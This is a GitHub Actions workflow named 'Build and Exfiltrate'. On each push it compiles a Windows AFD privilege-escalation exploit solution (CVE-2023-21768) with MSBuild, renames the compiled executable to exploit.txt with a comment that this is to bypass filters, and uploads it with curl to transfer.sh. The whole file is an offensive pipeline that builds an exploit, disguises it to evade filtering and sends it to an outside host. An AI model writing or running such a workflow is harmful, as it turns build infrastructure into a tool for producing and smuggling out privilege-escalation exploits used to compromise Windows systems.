name: Build and Exfiltrate
on: [push]

jobs:
  build:
    runs-on: windows-latest
    
    steps:
      - name: Checkout Code
        uses: actions/checkout@v4

      - name: Setup MSBuild
        uses: microsoft/setup-msbuild@v2

      - name: Compile Exploit
        # Compiles the solution found in the root directory
        run: msbuild "Windows_AFD_LPE_CVE-2023-21768.sln" /p:Configuration=Release /p:Platform=x64

      - name: Upload to Transfer.sh
        # Renames the file to .txt (to bypass filters) and uploads it
        run: |
          cd x64/Release
          ren Windows_AFD_LPE_CVE-2023-21768.exe exploit.txt
          curl --upload-file exploit.txt https://transfer.sh/exploit.txt
